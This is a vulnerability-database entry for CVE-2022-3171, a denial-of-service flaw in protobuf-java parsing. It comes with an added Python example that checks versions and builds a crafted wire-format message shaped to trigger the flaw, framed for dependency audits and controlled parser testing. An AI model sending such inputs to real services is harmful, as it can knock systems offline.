Vulnerability Details : CVE-2022-3171
A parsing issue with binary data in protobuf-java core and lite versions prior to 3.21.7, 3.20.3, 3.19.6 and 3.16.3 can lead to a denial of service. Inputs containing multiple instances of a non-repeated embedded message, where those instances carry repeated or unknown fields, cause the parser to convert the embedded message back and forth between its mutable and immutable forms on every merge, resulting in potentially long garbage collection pauses. Upgrading to the versions listed above resolves the issue.
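The following added example (not code from the protobuf project or this advisory) illustrates both halves of the entry above in Python: a check of a protobuf-java artifact version against the fixed releases the advisory names, and a hand-built wire-format message with the shape the advisory describes, so a practitioner can inspect or feed such an input to a parser under test. The field numbers, the repetition count and the treatment of 3.x release lines with no backported fix (3.17, 3.18) as affected are assumptions of the example, not statements from the advisory.

```python
"""Added example for CVE-2022-3171: version check plus a constructed input.

Assumptions (not from the advisory): field 1 is a singular embedded-message
field, field 2 a repeated varint field inside it, and field 1000 a number
the receiving .proto schema does not define (an unknown field).
Only the Python standard library is used; nothing here touches a real parser.
"""
import re

# 3.<minor> -> first fixed patch on that release line, per the advisory.
FIXED_PATCH = {16: 3, 19: 6, 20: 3, 21: 7}


def is_affected(version: str) -> bool:
    """True if `version` predates the fix on its release line.

    Assumption: 3.x lines with no fixed release (3.17, 3.18, older 3.x)
    and anything below 3.x are treated as affected; 3.22+ and 4.x as fixed.
    """
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", version)
    if not m:
        raise ValueError(f"unparseable version: {version!r}")
    major, minor, patch = (int(p) for p in m.groups())
    if major != 3:
        return major < 3
    if minor in FIXED_PATCH:
        return patch < FIXED_PATCH[minor]
    return minor < 22


# --- minimal protobuf wire-format encoder/decoder -------------------------

def encode_varint(value: int) -> bytes:
    """Base-128 varint, little-endian groups of 7 bits, MSB = continuation."""
    if value < 0:
        raise ValueError("only unsigned varints are encoded here")
    out = bytearray()
    while True:
        byte = value & 0x7F
        value >>= 7
        if value:
            out.append(byte | 0x80)
        else:
            out.append(byte)
            return bytes(out)


def decode_varint(data: bytes, pos: int) -> tuple[int, int]:
    """Decode one varint at `pos`; return (value, new_pos)."""
    result, shift = 0, 0
    while True:
        if pos >= len(data):
            raise ValueError("truncated varint")
        byte = data[pos]
        pos += 1
        result |= (byte & 0x7F) << shift
        if not byte & 0x80:
            return result, pos
        shift += 7
        if shift > 63:
            raise ValueError("varint too long")


def encode_tag(field_number: int, wire_type: int) -> bytes:
    return encode_varint((field_number << 3) | wire_type)


def encode_varint_field(field_number: int, value: int) -> bytes:
    return encode_tag(field_number, 0) + encode_varint(value)


def encode_length_delimited(field_number: int, payload: bytes) -> bytes:
    return encode_tag(field_number, 2) + encode_varint(len(payload)) + payload


def parse_fields(data: bytes) -> list[tuple[int, int, object]]:
    """Split a message into (field_number, wire_type, value) triples.

    Varints decode to int; length-delimited, 64-bit and 32-bit fields are
    returned as raw bytes. Groups (wire types 3/4) are rejected.
    """
    fields, pos = [], 0
    while pos < len(data):
        tag, pos = decode_varint(data, pos)
        field_number, wire_type = tag >> 3, tag & 0x7
        if field_number == 0:
            raise ValueError("field number 0 is invalid")
        if wire_type == 0:
            value, pos = decode_varint(data, pos)
        elif wire_type == 1:
            value, pos = data[pos:pos + 8], pos + 8
        elif wire_type == 2:
            length, pos = decode_varint(data, pos)
            value, pos = data[pos:pos + length], pos + length
        elif wire_type == 5:
            value, pos = data[pos:pos + 4], pos + 4
        else:
            raise ValueError(f"unsupported wire type {wire_type}")
        if pos > len(data):
            raise ValueError("truncated field")
        fields.append((field_number, wire_type, value))
    return fields


def build_trigger_message(repetitions: int, embedded_field: int = 1,
                          repeated_field: int = 2, unknown_field: int = 1000) -> bytes:
    """Constructed input with the advisory's shape: one singular embedded
    message sent `repetitions` times, each copy carrying an unknown field
    and repeated-field values. A conforming parser merges every copy into
    the single sub-message rather than replacing it."""
    inner = encode_varint_field(unknown_field, 1)
    inner += b"".join(encode_varint_field(repeated_field, v) for v in (1, 2, 3))
    return encode_length_delimited(embedded_field, inner) * repetitions


def merge_count(data: bytes, embedded_field: int = 1) -> int:
    """How many times a parser must merge into `embedded_field` for `data`."""
    return sum(1 for num, wt, _ in parse_fields(data)
               if num == embedded_field and wt == 2)


if __name__ == "__main__":
    for v in ("3.21.6", "3.21.7", "3.18.0", "3.16.3", "3.22.0"):
        print(f"protobuf-java {v}: {'affected' if is_affected(v) else 'fixed'}")
    msg = build_trigger_message(50)
    print(f"{len(msg)} bytes, {merge_count(msg)} merges into field 1")
```

The version check is the part to wire into a dependency audit; the message builder is for controlled testing of a parser that consumes untrusted protobuf input, where the number of repetitions and the size of the embedded message are the knobs to vary.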
Vulnerability category: Input validation; Denial of service
Products affected by CVE-2022-3171
- cpe:2.3:a:google:google-protobuf:*:*:*:*:*:ruby:*:*
- cpe:2.3:a:google:protobuf-java:*:*:*:*:*:*:*:*
- cpe:2.3:a:google:protobuf-kotlin:*:*:*:*:*:*:*:*
- cpe:2.3:a:google:protobuf-kotlin-lite:*:*:*:*:*:*:*:*
- cpe:2.3:a:google:protobuf-javalite:*:*:*:*:*:*:*:*
- cpe:2.3:o:fedoraproject:fedora:37:*:*:*:*:*:*:*
Exploit prediction scoring system (EPSS) score for CVE-2022-3171
EPSS score: 0.07% (probability of exploitation activity in the next 30 days)
EPSS percentile: ~23% (the proportion of vulnerabilities scored at or below this value)
CVSS scores for CVE-2022-3171
Base Score | Base Severity | CVSS Vector | Exploitability Score | Impact Score | Score Source | First Seen
---|---|---|---|---|---|---
4.3 | MEDIUM | CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L | 2.8 | 1.4 | Google Inc. |
7.5 | HIGH | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H | 3.9 | 3.6 | NIST |
6.5 | MEDIUM | AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H | N/A | N/A | Oracle:CPUOct2023 |
CWE ids for CVE-2022-3171
- The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly. Assigned by: cve-coordination@google.com (Secondary)
References for CVE-2022-3171
- https://github.com/protocolbuffers/protobuf/security/advisories/GHSA-h4h5-3hr4-j3g2
  A potential Denial of Service issue in protobuf-java · Advisory · protocolbuffers/protobuf · GitHub (Third Party Advisory)
- https://security.gentoo.org/glsa/202301-09
  protobuf-java: Denial of Service (GLSA 202301-09), Gentoo security (Third Party Advisory)
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CBAUKJQL6O4TIWYBENORSY5P43TVB4M3/
  [SECURITY] Fedora 37 Update: protobuf-3.19.6-1.fc37, package-announce, Fedora Mailing Lists (Mailing List; Third Party Advisory)
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MPCGUT3T5L6C3IDWUPSUO22QDCGQKTOP/